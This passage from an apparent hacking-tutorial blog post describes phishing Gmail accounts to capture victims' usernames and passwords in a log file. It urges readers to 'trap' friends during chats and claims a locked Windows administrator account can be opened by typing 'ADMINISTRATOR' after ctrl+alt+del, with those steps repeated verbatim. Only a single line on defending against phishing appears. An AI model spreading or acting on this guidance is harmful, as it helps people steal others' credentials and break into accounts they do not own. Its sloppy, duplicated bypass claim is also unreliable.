7. In log.txt you will see his username and password .
All steps are done, By this method you can Hack Any Gmail Account Easily. But still we are one step behind. Its easy to create and set up a Phisher, Its bit hard to trap victim in our phisher. You have create new ideas which chatting and mean while have to trap victim. This method is known as Smart Phishing or Smart Gmail Phisher. By this you can Hack Gmail Account For Free
How To Defense From Phishing ?
- Never enter your account information to the unknown webpage, always check the address bar and thus the webpage real address.So friends, I hope you enjoyed this Tut. If you have any dobts regading this just comment...
How to open locked administrator account without software?
1.when the locked accounts come press ctrl+alt+del
2.then there come a window this window type in first box "ADMINISTRATOR"
and press enter and u logged in
1.when the locked accounts come press ctrl+alt+del
2.then there come a window this window type in first box "ADMINISTRATOR"
and press enter and u logged in
How to Hack Gmail Account password
ordinary mode to hack Gmail tab password.I have posted this mode for hacking facebook tab password earlier and now gmail tab.That is Phishing. This is one of the best mode to hack gmail password.This will work only if your friend don’t know about this mode of hacking gmail.
For this We need three files:
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